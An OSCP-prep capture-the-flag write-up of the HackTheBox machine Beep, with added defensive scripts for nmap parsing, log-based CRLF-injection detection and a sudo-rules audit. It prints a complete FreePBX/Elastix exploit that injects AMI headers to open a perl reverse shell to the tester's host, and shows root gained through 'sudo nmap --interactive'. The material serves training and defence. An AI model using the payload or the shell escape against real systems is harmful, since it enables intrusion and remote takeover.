TJ_Null’s OSCP Prep – HTB – Beep
Beep is a Linux machine with a lot of ports open, so enumeration took a long time. There were many ways to exploit this machine, and to get root as well. However I’ll not show all of them. The webserver is running a vulnerable version of Elastix, which results in RCE. The low-privileged user could run many commands with sudo, giving us a lot of options to escalate our privileges.
Enumeration
I’ll first start with an nmap scan.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 15:29 EST
Stats: 0:01:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 15:31 (0:00:06 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.030s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP LOGIN-DELAY(0) STLS PIPELINING UIDL USER RESP-CODES AUTH-RESP-CODE IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: BINARY Completed THREAD=ORDEREDSUBJECT LIST-SUBSCRIBED ACL UIDPLUS OK STARTTLS URLAUTHA0001 SORT=MODSEQ IMAP4 CATENATE CHILDREN IDLE MULTIAPPEND CONDSTORE X-NETSCAPE NAMESPACE UNSELECT MAILBOX-REFERRALS SORT LISTEXT RIGHTS=kxte ANNOTATEMORE ID RENAME NO IMAP4rev1 LITERAL+ THREAD=REFERENCES ATOMIC QUOTA
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2022-01-19T21:34:53+00:00; +1h01m51s from scanner time.
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 1h01m50s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 316.87 seconds
There were many ports open. To make it easier to see all of them, I ran a new nmap scan, leaving out version detection and the default scripts.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -p- --min-rate 10000 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 14:24 EST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.068s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
878/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
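Instead of rescanning just to get a compact list, the port table can be pulled straight out of the normal-output (-oN) report already saved as nmap.result. The following Python script is an added example, not part of the original writeup: it parses the port lines, attaches the NSE script output that follows each port, and picks out the HTTP-based services that are the natural next enumeration step. The embedded SAMPLE_SCAN is an excerpt of the first scan above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Excerpt of the first nmap -oN scan above (whitespace as extracted); the parser
# also handles the aligned columns nmap normally prints.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.7
Host is up (0.030s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.10.10.7/
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
878/tcp open status 1 (RPC #100024)
4445/tcp open upnotifyp?
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
Service Info: Hosts: beep.localdomain; OS: Unix
"""

# "22/tcp open ssh OpenSSH 4.3 (protocol 2.0)" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: Optional[str]
    scripts: List[str] = field(default_factory=list)  # NSE lines that followed the port


def parse_ports(text: str, state: str = "open") -> List[PortEntry]:
    """Return the port table of an nmap normal-output report, filtered by state."""
    entries: List[PortEntry] = []
    current: Optional[PortEntry] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            port, proto, st, service, version = m.groups()
            current = PortEntry(int(port), proto, st, service, version or None)
            entries.append(current)
        elif line.startswith("|") and current is not None:
            # "| foo" and "|_foo" are NSE script lines belonging to the previous port.
            current.scripts.append(line.lstrip("|_ "))
    return [e for e in entries if e.state == state]


def http_ports(entries: List[PortEntry]) -> List[int]:
    """Ports whose detected service is HTTP-based (candidates for web enumeration)."""
    return [e.port for e in entries if "http" in e.service]


def summary(entries: List[PortEntry]) -> str:
    """One compact line per port, similar to the second scan above but with versions."""
    return "\n".join(
        f"{e.port}/{e.proto:<3} {e.service:<10} {e.version or ''}".rstrip() for e in entries
    )


if __name__ == "__main__":
    ports = parse_ports(SAMPLE_SCAN)
    print(summary(ports))
    print("web ports:", http_ports(ports))
```

Running it against the real nmap.result file (`parse_ports(open("nmap.result").read())`) gives the same compact view as the second scan without a second pass over all 65535 ports, and keeps the version strings that the plain port scan drops.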
Enumerating all these ports took some time. So let’s take a look at the webserver running on port 80.
The webserver redirects us to HTTPS. The webserver is running Elastix. Elastix is a unified communications server that brings together IP PBX, email, IM, faxing and collaboration functionality. That explains all the open ports on this machine.
Running a gobuster scan against the webserver over HTTPS (where port 80 redirects us). -k skips SSL certificate verification; otherwise the scan will fail.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/big.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
/.htaccess (Status: 403) [Size: 287]
/.htpasswd (Status: 403) [Size: 287]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/ (Status: 403) [Size: 286]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico (Status: 200) [Size: 894]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/robots.txt (Status: 200) [Size: 28]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
===============================================================
2022/01/21 14:45:53 Finished
===============================================================
Going to /admin we are prompted with a popup login. Clicking cancel, we are redirected to this page.
So we can see that the webserver is also running FreePBX 2.8.1.4.
A forum post I saw explains the difference between FreePBX and Elastix:
Asterisk started it all, and is the base platform switch under the covers handling the main switch functions.
Freepbx came along to make it easier to use GUI with some extra tools. Huge for new users.
Elastix leveraged Freepbx version and added applications like the call center that enables you to manage large call groups effectively. They also packaged several other great products with the platform to make the install a complete business communications platform.
https://www.elastix.org/community/threads/difference-between-elastix-freepbx-and-asterisk.115899/
Initial Access
There is a vulnerability in FreePBX/Elastix which can give us RCE.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# cat 18650.py
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="localhost"
lhost="10.10.14.17"
lport=4444
extension="233"
ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
In order for this script to work, we have to do a couple of things. Since this server is so old, the SSL cert is no longer valid and throws an error at us. You can either strip SSL, or redirect traffic from localhost to 10.10.10.7:443 through Burp Suite.
Then you have to find the existing extension line. Using the sipvicious svwar.py script, we could easily find it.
┌──(root💀kali)-[/home/…/HTB/beep/sipvicious/sipvicious]
└─# python3 svwar.py -m INVITE -e100-500 10.10.10.7
| Extension | Authentication |
------------------------------
| 233 | reqauth |
Starting an nc listener and running the script will give us a connection.
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.7] 54087
whoami
asterisk
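From the defensive side, the request this exploit sends is easy to spot in the web server’s access log: the callmenum value carries URL-encoded CR/LF (%0D%0A) followed by extra Asterisk Manager (AMI) headers, and a legitimate call-me request never contains a line break. The Python below is an added example written for this writeup, not code from the exploit or from FreePBX/Elastix. The Apache combined-log lines are constructed, with the second one carrying the start of the payload shown above, and the rule is more general than this one bug: any decoded query parameter containing CR or LF is flagged, with the callme_page.php path called out specifically.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

CALLME_PATH = "/recordings/misc/callme_page.php"

# Constructed Apache combined-log lines, not taken from the box. The second one
# carries the beginning of the exploit's callmenum value: %0D%0A is an encoded
# CRLF that lets additional AMI headers be smuggled into the request the page builds.
SAMPLE_LOG = [
    '10.10.14.17 - - [19/Jan/2022:15:40:01 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.17 - - [19/Jan/2022:15:41:12 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl HTTP/1.1" 200 512 "-" "Python-urllib/1.17"',
    '10.10.14.17 - - [19/Jan/2022:15:42:30 -0500] "GET /index.php HTTP/1.1" 200 1340 "-" "Mozilla/5.0"',
]

# ip ident user [timestamp] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_target(target: str) -> List[str]:
    """Flag CRLF injection in any percent-decoded query parameter of one request target."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %0D%0A to "\r\n"
    findings: List[str] = []
    for name, values in params.items():
        for value in values:
            if "\r" not in value and "\n" not in value:
                continue
            findings.append(f"CRLF in parameter {name}")
            # Everything after the first line break is structure the client added;
            # report the header names so an analyst sees what was smuggled in.
            for line in re.split(r"\r\n|\r|\n", value)[1:]:
                line = line.strip()
                if line:
                    findings.append("injected header: " + line.split(":", 1)[0])
    if findings and parts.path.endswith(CALLME_PATH):
        findings.append("FreePBX callme_page.php: AMI header injection")
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line whose request target triggers a finding."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        findings = analyse_target(m["target"])
        if findings:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"])
        for finding in hit["findings"]:
            print("   ", finding)
```

Apache writes the request line as it was received, so the encoded %0D%0A survives in the log and the decode step is what exposes the line breaks; the same check works on a reverse proxy or WAF log that records the raw target.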
Root
Running sudo -l as asterisk gave us a list of commands the user can run as sudo.
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2#
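Any of the fourteen NOPASSWD entries above is worth auditing before an attacker reads the same list. As an added example (not from the writeup), this Python script parses the sudo -l output shown above and sorts the rules into binaries that are root-equivalent on their own, plain distribution tools, and custom or vendor scripts such as hardware_detector and elastix-helper whose source needs review. The reasons in ROOT_EQUIVALENT are a constructed, non-exhaustive list (nmap’s --interactive escape is the one used on this box), and the STANDARD_TOOLS allowlist is likewise an assumption made for the example.

```python
import re
from typing import Dict, List, NamedTuple

# The sudo -l output shown above, as the asterisk user saw it (env_keep lines abbreviated).
SUDO_L_OUTPUT = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# Constructed, non-exhaustive reasons why an unrestricted grant of these binaries
# is equivalent to root. nmap's case is the one demonstrated on this box.
ROOT_EQUIVALENT = {
    "nmap": "old versions (4.11 here) offer --interactive with a !sh shell escape",
    "yum": "installs arbitrary packages and plugins whose scripts run as root",
    "chmod": "can make any file setuid or world-writable",
    "chown": "can take ownership of any file on the system",
    "touch": "creates or re-timestamps arbitrary files as root",
}

# Assumed allowlist of distribution tools whose grant the admin reviewed on purpose.
STANDARD_TOOLS = {"shutdown", "service", "init", "postmap", "postfix", "saslpasswd2", "chkconfig"}

# "(root) NOPASSWD: /usr/bin/nmap" -> runas, tag list, command(s)
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract (runas, NOPASSWD, command) rules from `sudo -l` output."""
    rules: List[SudoRule] = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = m["tags"].upper()
        # sudo -l may list several commands on one line, separated by ", ".
        for cmd in m["cmds"].split(", "):
            rules.append(SudoRule(m["runas"], "NOPASSWD:" in tags, cmd.strip()))
    return rules


def audit(rules: List[SudoRule]) -> Dict[str, List[str]]:
    """Sort rules into root-equivalent grants, allowlisted tools, and entries to review."""
    report: Dict[str, List[str]] = {"root_equivalent": [], "allowlisted": [], "review": []}
    for rule in rules:
        name = rule.command.rsplit("/", 1)[-1]
        if name in ROOT_EQUIVALENT:
            report["root_equivalent"].append(f"{rule.command}: {ROOT_EQUIVALENT[name]}")
        elif name in STANDARD_TOOLS:
            report["allowlisted"].append(rule.command)
        else:
            report["review"].append(rule.command)  # custom/vendor script: read its source
    return report


if __name__ == "__main__":
    for section, items in audit(parse_sudo_l(SUDO_L_OUTPUT)).items():
        print(section)
        for item in items:
            print("   ", item)
```

A hardened sudoers would replace these bare command grants with exact argument patterns (for example `/sbin/service asterisk restart` rather than `/sbin/service`) and drop chmod, chown and touch entirely, since sudo cannot restrict which file they are pointed at.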
What I’ve learned
- This box was kind of overwhelming with how many ways there were to get a shell, as well as all the open ports. Understanding the connection between all the open ports is important.
- Focusing on ports I know and not doing too much at the same time will surely increase my effectiveness.
- Before doing an exploit, finish with the enumeration stage. Document everything in a note-taking app. I use Obsidian for that, which is an amazing note-taking tool that uses Markdown.